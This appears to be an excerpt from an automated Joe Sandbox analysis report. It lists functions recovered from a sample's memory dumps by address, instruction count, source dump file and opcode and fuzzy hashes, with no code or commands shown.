                                                                            • Instruction Fuzzy Hash: 7641B961B19D5D4FE7A8F7A884BA7B462D2EBAC310F55017AE40DC32E3DD2C6D418741
                                                                            Function 00007FFD9BC82788 Relevance: .1, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a9edbcf6970f82c13960fa2041b40ecc788d2faacc7e176996aff4732eac7c0
                                                                            • Instruction ID: 2870f0027b99182235674298b111481ce75d753bfc9cab5209cd1517fa37a0e3
                                                                            • Opcode Fuzzy Hash: 2a9edbcf6970f82c13960fa2041b40ecc788d2faacc7e176996aff4732eac7c0
                                                                            • Instruction Fuzzy Hash: D5410731E1D95E8FEB78DAA894786B877A1FF50300F1545B9C04ECB1E6CD38BA858B40
                                                                            Function 00007FFD9BC88A77 Relevance: .1, Instructions: 127COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 842db4ee695c435bccf0c6371a7d205ae948d5f7533d75c44e3a99d35812be42
                                                                            • Instruction ID: 47361f82d5496e6de2caa8905f6438c0b83364f58184049631cbe240192bfb53
                                                                            • Opcode Fuzzy Hash: 842db4ee695c435bccf0c6371a7d205ae948d5f7533d75c44e3a99d35812be42
                                                                            • Instruction Fuzzy Hash: BE41823160C9498FDF98EB28C4A5DA9B3E1FBB931571501AED00AC36A2DE34E845CB81
                                                                            Function 00007FFD9BC83A67 Relevance: .1, Instructions: 127COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4c8c339ccc35284a51b72115e6201c031451a9f83716459de8d7e3460ceba483
                                                                            • Instruction ID: 329618baf0a47cf67134d7411ebbe4021208d4923e7debc93d6980aea2f6e1d3
                                                                            • Opcode Fuzzy Hash: 4c8c339ccc35284a51b72115e6201c031451a9f83716459de8d7e3460ceba483
                                                                            • Instruction Fuzzy Hash: 4141733160D9498FDF98EB68C4A5DA5B3E1FBB831071501AAE05EC3292DE35ED45CB81
                                                                            Function 00007FFD9B89095A Relevance: .1, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eb9ed2d073ec6f03dfd87b3eb9d1b6a67c9576085193ef2b1ae1b90e7f207b2a
                                                                            • Instruction ID: f2c707f460bf792fc4c0f9b55798e9309c2fd87fa85fd40a8b0e94c647a64435
                                                                            • Opcode Fuzzy Hash: eb9ed2d073ec6f03dfd87b3eb9d1b6a67c9576085193ef2b1ae1b90e7f207b2a
                                                                            • Instruction Fuzzy Hash: 8F310B15B0DA2D1FEB58B77874AAAF977C5DF48325B1440BBE40EC31E7DD18AC428285
                                                                            Function 00007FFD9BC88B21 Relevance: .1, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e685b6f9930df4ab29e6cc19c6c281f7c9d63356024dcbae9e1e8ca96493336d
                                                                            • Instruction ID: 8960cba23f51fce77f1e456aae2fdf4e63d4c3c5af7c677b3e6cc94aeedf5422
                                                                            • Opcode Fuzzy Hash: e685b6f9930df4ab29e6cc19c6c281f7c9d63356024dcbae9e1e8ca96493336d
                                                                            • Instruction Fuzzy Hash: F1319E31608D498FDB9CEF28C4A5D68B3E1FBB935171502AED44AC76A2DE34E845CB81
                                                                            Function 00007FFD9BC83B11 Relevance: .1, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6c58853b73b698a65ae2eb5a10f35cc21944e2ef673310bb59d1171268dcd0e5
                                                                            • Instruction ID: f0dec61274c5e5e9a89be1f983760b76e2cf4c7a79098ca7cf3dc22b4e1bf211
                                                                            • Opcode Fuzzy Hash: 6c58853b73b698a65ae2eb5a10f35cc21944e2ef673310bb59d1171268dcd0e5
                                                                            • Instruction Fuzzy Hash: D531923160C9498FDB9CEF28C4A5E64B3E1FBB831071501AED05EC72A2DE25EC45CB81
                                                                            Function 00007FFD9B890960 Relevance: .1, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b5ebfd699a08577cc56c4e35e181f1bc3463459525318955d3b7f5d321447958
                                                                            • Instruction ID: 9811d71f0a165788e7e2344f1a35eb7aac03804e446fbd993c1c589089a02758
                                                                            • Opcode Fuzzy Hash: b5ebfd699a08577cc56c4e35e181f1bc3463459525318955d3b7f5d321447958
                                                                            • Instruction Fuzzy Hash: A131FB11B1C92D1EFB58B768746AAB977C5DF58329B1440BBE40EC31E7DD18AC414285
                                                                            Function 00007FFD9BC88ABB Relevance: .1, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6c0b2e845fc9ad41eab00f33cacbd8c6eec5f169c54dfbde976e9fee68297953
                                                                            • Instruction ID: 849edb602f7512ca07d33e1bc8fcfee976e44a5901f47e3fa42bd44f48e86dcd
                                                                            • Opcode Fuzzy Hash: 6c0b2e845fc9ad41eab00f33cacbd8c6eec5f169c54dfbde976e9fee68297953
                                                                            • Instruction Fuzzy Hash: D2318131608D498FDF9CEF28C4A5DA9B3E1FBB935171501AED04AC76A2DE34E845CB81
                                                                            Function 00007FFD9BC83AAB Relevance: .1, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b8f53cc7c5cbe76293c3c4c4fe00becb17e2c08779c671d9bcaadd4ece488f8b
                                                                            • Instruction ID: 4b7e17c69c41b4273a557d70b1601a1ea5acb190687d9539f560521d4b00cfe6
                                                                            • Opcode Fuzzy Hash: b8f53cc7c5cbe76293c3c4c4fe00becb17e2c08779c671d9bcaadd4ece488f8b
                                                                            • Instruction Fuzzy Hash: 3D31527160C9498FDB9CEF28C4A5EA5B3E1FBB831071501A9E05EC72A2DE35ED45CB81
                                                                            Function 00007FFD9B891171 Relevance: .1, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6cce57b1d2af3ca1bd69c37cb40d83212805709fffbea3c9249499d0ce0b828a
                                                                            • Instruction ID: da7b265b72a78a301126da08217d7de078b9f100bfeb07ec594bc505db60722c
                                                                            • Opcode Fuzzy Hash: 6cce57b1d2af3ca1bd69c37cb40d83212805709fffbea3c9249499d0ce0b828a
                                                                            • Instruction Fuzzy Hash: B131A630A0D6999FDF56EBB4C8659A97FF1FF1A310B0505FAD04AD71A2DA38A841C740
                                                                            Function 00007FFD9B89360E Relevance: .1, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 28d24992345567860a792fb868b1dfd4d4ff371a0a993bd1398711ca2db07e3d
                                                                            • Instruction ID: 0f38314908b75a843ade822339802a1e5a10b74a76cfb6e16e72ff48aca23f3f
                                                                            • Opcode Fuzzy Hash: 28d24992345567860a792fb868b1dfd4d4ff371a0a993bd1398711ca2db07e3d
                                                                            • Instruction Fuzzy Hash: D3216521F1D90D4FEFA5E768C46567826D2EF9C710F570175D04ED32B2DD28AE414601
                                                                            Function 00007FFD9B890998 Relevance: .1, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6266410a2ad4a7a4684efb8ae053f437a713329b9511534baad4fb77fa6f67f1
                                                                            • Instruction ID: beccfe5251b69696b7b413ad99d50b2f5b98102ef7cecd3c3aca7799d85a317a
                                                                            • Opcode Fuzzy Hash: 6266410a2ad4a7a4684efb8ae053f437a713329b9511534baad4fb77fa6f67f1
                                                                            • Instruction Fuzzy Hash: 6C21F220B1991D1FFB98B76C546AB7976C6EB9C315B5100BAE40DC32E7DD28AC418281
                                                                            Function 00007FFD9BC83888 Relevance: .1, Instructions: 91COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9bbec5d5581d7f402b2ff59aa5b337da2b1d4a1b40016b51abef24c0e0b9fed5
                                                                            • Instruction ID: 773ea27a799d1072bb394cc12ff91c5144c3bc13cce20c8d0bef563161fd724d
                                                                            • Opcode Fuzzy Hash: 9bbec5d5581d7f402b2ff59aa5b337da2b1d4a1b40016b51abef24c0e0b9fed5
                                                                            • Instruction Fuzzy Hash: 3A316030F0ED0ECEEB68DBA494A15BD77B1FF94300F61117AF02ED21A0DA396A409791
                                                                            Function 00007FFD9B890C25 Relevance: .1, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: afe137d81816e98d632870dbf8d209881760d391326c61bb0604bd3b3734c65a
                                                                            • Instruction ID: 0192563a17a18f47ceffdc6236f8b48bb9de006ab4cce9e3db74adca6ffefdbf
                                                                            • Opcode Fuzzy Hash: afe137d81816e98d632870dbf8d209881760d391326c61bb0604bd3b3734c65a
                                                                            • Instruction Fuzzy Hash: 0F213736B1E25D8FEB26A7A8AC650DC7F60EF46324F0541F3D058CB1D3D92826468381
                                                                            Function 00007FFD9BC8889C Relevance: .1, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 83f5a13ca5aa4e08d115597b6e65e9e99d2d92d39ad5e33411e816eb3cda9324
                                                                            • Instruction ID: e55bd0849b3a09277f30ebbe58792affc3c50775a05f9cdc490afb8207ccb826
                                                                            • Opcode Fuzzy Hash: 83f5a13ca5aa4e08d115597b6e65e9e99d2d92d39ad5e33411e816eb3cda9324
                                                                            • Instruction Fuzzy Hash: 15311830E1ED0ECEEBB8DBA494615BD77B1FF54300F51017AD42EE69A1DB396A009782
                                                                            Function 00007FFD9BC80C1D Relevance: .1, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ba97f6f916c6be08440847b1d85c9e06b50af3df3258d30eca4f860e9895b0d9
                                                                            • Instruction ID: e558c6f8132322ac9eeff7bfbd66b1cdd5b8c24ef8141c62478e799a976c503e
                                                                            • Opcode Fuzzy Hash: ba97f6f916c6be08440847b1d85c9e06b50af3df3258d30eca4f860e9895b0d9
                                                                            • Instruction Fuzzy Hash: 7C21D330B0A90E8FD764DBA8C4618ACB7A1FF45760F51427AD05D9B2A2CF247E52C791
                                                                            Function 00007FFD9BC84B72 Relevance: .1, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5cea91aca23c9aaf3eb359fc6ecbbf7ba5daa468fb2b0c9d55335e3ed33ff017
                                                                            • Instruction ID: 43700c373212c8d2f745b8be73272bdd16968caf67f0eda155e07435dd8c6ead
                                                                            • Opcode Fuzzy Hash: 5cea91aca23c9aaf3eb359fc6ecbbf7ba5daa468fb2b0c9d55335e3ed33ff017
                                                                            • Instruction Fuzzy Hash: D021FB70A0581D9FDF98DB68D4A5AECB7F1FF68300F1101AED04EE32A1CA34A941CB40
                                                                            Function 00007FFD9BC87798 Relevance: .1, Instructions: 80COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d8ec14fe5c6dc69277ea670e5e871fa45ed26274194b09dfc31f27a42163751a
                                                                            • Instruction ID: b6fb2034818c35bc0458acb48dd1537ee77ce1db1e72d33d970e8155ab3fb26a
                                                                            • Opcode Fuzzy Hash: d8ec14fe5c6dc69277ea670e5e871fa45ed26274194b09dfc31f27a42163751a
                                                                            • Instruction Fuzzy Hash: 16212910A1E85B4AF33AC36454748BC7791EF5030472646BFC05B8B4A7E83CB985D391
                                                                            Function 00007FFD9BC84028 Relevance: .1, Instructions: 77COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dde5168c68910111f7276e0068cc1efe77e56f678ddce9c72ec63a1582d8faf3
                                                                            • Instruction ID: fdd57eeab224d86526ff8285fc238569565297a5afb49d7772a25fde1b8a4537
                                                                            • Opcode Fuzzy Hash: dde5168c68910111f7276e0068cc1efe77e56f678ddce9c72ec63a1582d8faf3
                                                                            • Instruction Fuzzy Hash: 30217C30E1995EDFDB54DBA8C8609ADBBB1FF58340F51017DD00AE32A1DB3469058B41
                                                                            Function 00007FFD9BC877A0 Relevance: .1, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2296cdb0ac81752a2d10bcd1bdfdc9b68bffada2dc4e25389ec38e77211e5d39
                                                                            • Instruction ID: c4fbd8c569c6c4bcca9f7a4acec9a9384c890e19eccea904a4b6fea79002f42d
                                                                            • Opcode Fuzzy Hash: 2296cdb0ac81752a2d10bcd1bdfdc9b68bffada2dc4e25389ec38e77211e5d39
                                                                            • Instruction Fuzzy Hash: 2311D810A1D86F46E639C36854749BC7391EB60305736467FC06B978AAE83CBA81D790
                                                                            Function 00007FFD9BC82790 Relevance: .1, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 53ae0ec1009a52042df9f38b75079c22c74b7455c73b282d1271fc0eb73e8699
                                                                            • Instruction ID: 8c1899330076d1a6f601c28bfd41713291de637e16deee719e12c7d7e6835407
                                                                            • Opcode Fuzzy Hash: 53ae0ec1009a52042df9f38b75079c22c74b7455c73b282d1271fc0eb73e8699
                                                                            • Instruction Fuzzy Hash: 1D112B11B1DC2E87FA3896E4A4785B97792FB60301B254575D45B8F0EACC3CFA819790
                                                                            Function 00007FFD9BC81810 Relevance: .1, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7e499b0b42e0f951d005a8ac6d6d6d1c7932dcd2a534ec87d9c4b776ed4cd7c8
                                                                            • Instruction ID: 94d0613e2de296c9c8593e7e271c916c238020b50c17f447e09bdbac71896bbf
                                                                            • Opcode Fuzzy Hash: 7e499b0b42e0f951d005a8ac6d6d6d1c7932dcd2a534ec87d9c4b776ed4cd7c8
                                                                            • Instruction Fuzzy Hash: 55112B20B09D0D4EE7A8EBA494218F973D0FF58350B41067AE40EC75E3DE34BA058390
                                                                            Function 00007FFD9BC8669E Relevance: .1, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8e9448b45d4abd8392662065ca013eb4ab38bb60979ffc8c55f6bbdf254bf518
                                                                            • Instruction ID: 19e893e2916e26ae7a4f413a4e568065e9cb07b2aac3ac0db88ef5f4d196f0a3
                                                                            • Opcode Fuzzy Hash: 8e9448b45d4abd8392662065ca013eb4ab38bb60979ffc8c55f6bbdf254bf518
                                                                            • Instruction Fuzzy Hash: E111483130990E4FE7289AA4E4256F97390EF54361F01023BF80DC72E1CA35AA408390
                                                                            Function 00007FFD9BC8168E Relevance: .1, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e96faf3ff780985cc7124e51a4d84558298115797e36c9e1e9e4dc512ebea155
                                                                            • Instruction ID: c6995b5179f16d43bb7ee0ffe0d8c75e905785d5fa6995b54876ee00b5a20389
                                                                            • Opcode Fuzzy Hash: e96faf3ff780985cc7124e51a4d84558298115797e36c9e1e9e4dc512ebea155
                                                                            • Instruction Fuzzy Hash: 5D11483130990E4FE7289AA4E4216F973D0EF583A1F11023BE909C76E2CE75AA408390
                                                                            Function 00007FFD9B890C38 Relevance: .1, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 61c0780c80f87b3a9ae718f360e7b1fe98b8c1f85fd462b873ed40b2b8a7b5e0
                                                                            • Instruction ID: 230c7c2bed52b42613fd10efac68d3a8ef574641c22b95d5a9ae5594a2e62bae
                                                                            • Opcode Fuzzy Hash: 61c0780c80f87b3a9ae718f360e7b1fe98b8c1f85fd462b873ed40b2b8a7b5e0
                                                                            • Instruction Fuzzy Hash: 4A11E332B1E68D8FEB12DBA8886019C7FB0EF55714F0641F7C094CB2A2D93826468780
                                                                            Function 00007FFD9BC80CF9 Relevance: .1, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e991ed208c8ec85612ffa87fa7ca7b2e20558829679f0c2a4d811eb6b7b626a9
                                                                            • Instruction ID: f1678415fb0f13126738d9d5705d0bc9d27fd38ca4f8883a9b5963325bc18808
                                                                            • Opcode Fuzzy Hash: e991ed208c8ec85612ffa87fa7ca7b2e20558829679f0c2a4d811eb6b7b626a9
                                                                            • Instruction Fuzzy Hash: 3701D631F0EA4C4FDB54EBE4A8715ECB7A1EF49310F05017AE009D7293CD256D018340
                                                                            Function 00007FFD9BC84888 Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 89e1423fe68ef99b61f9371d0eca4ebcbfaef005f4c91c1c4c32afddbeda5a7f
                                                                            • Instruction ID: 5747220448f38a99379e80887d93cfa9871ab580a2f341fd4e2eb0feb77be983
                                                                            • Opcode Fuzzy Hash: 89e1423fe68ef99b61f9371d0eca4ebcbfaef005f4c91c1c4c32afddbeda5a7f
                                                                            • Instruction Fuzzy Hash: CE117C42F0F9DFA6F67852F4347157C55409F94311F1B017ED80EC61E6DC6D2A8162A2
                                                                            Function 00007FFD9B890C40 Relevance: .1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2140255132.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9a16026e2774be653edb062d40e1cf3fd42cc812005528ea56bd85639d7f4c57
                                                                            • Instruction ID: f08ba52f3743b54e7fdeb92e2b1470203237cbd05d12cd6a7256c466ba9bfab6
                                                                            • Opcode Fuzzy Hash: 9a16026e2774be653edb062d40e1cf3fd42cc812005528ea56bd85639d7f4c57
                                                                            • Instruction Fuzzy Hash: D411A132F1E78D8FEB12DBA8886419D7FB0EF56714F0641F7D094DB2A2D93866498780
                                                                            Function 00007FFD9BC80C69 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a28518b184db2195c0675fa8b5a39b6feb17bb8e04bdbd953f477313f906323a
                                                                            • Instruction ID: 506f923719a81f9b1a61907558b37c5d63644e99f98fd22e2b2237cfd0398c6d
                                                                            • Opcode Fuzzy Hash: a28518b184db2195c0675fa8b5a39b6feb17bb8e04bdbd953f477313f906323a
                                                                            • Instruction Fuzzy Hash: 96017C31B0991D8FDB68E69894619BCF3A1FF48720B15427AD00ED3292CA207D1187D4
                                                                            Function 00007FFD9BC8681C Relevance: .0, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002D.00000002.2254952659.00007FFD9BC80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC80000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_45_2_7ffd9bc80000_PlZA6b48MW.jbxd
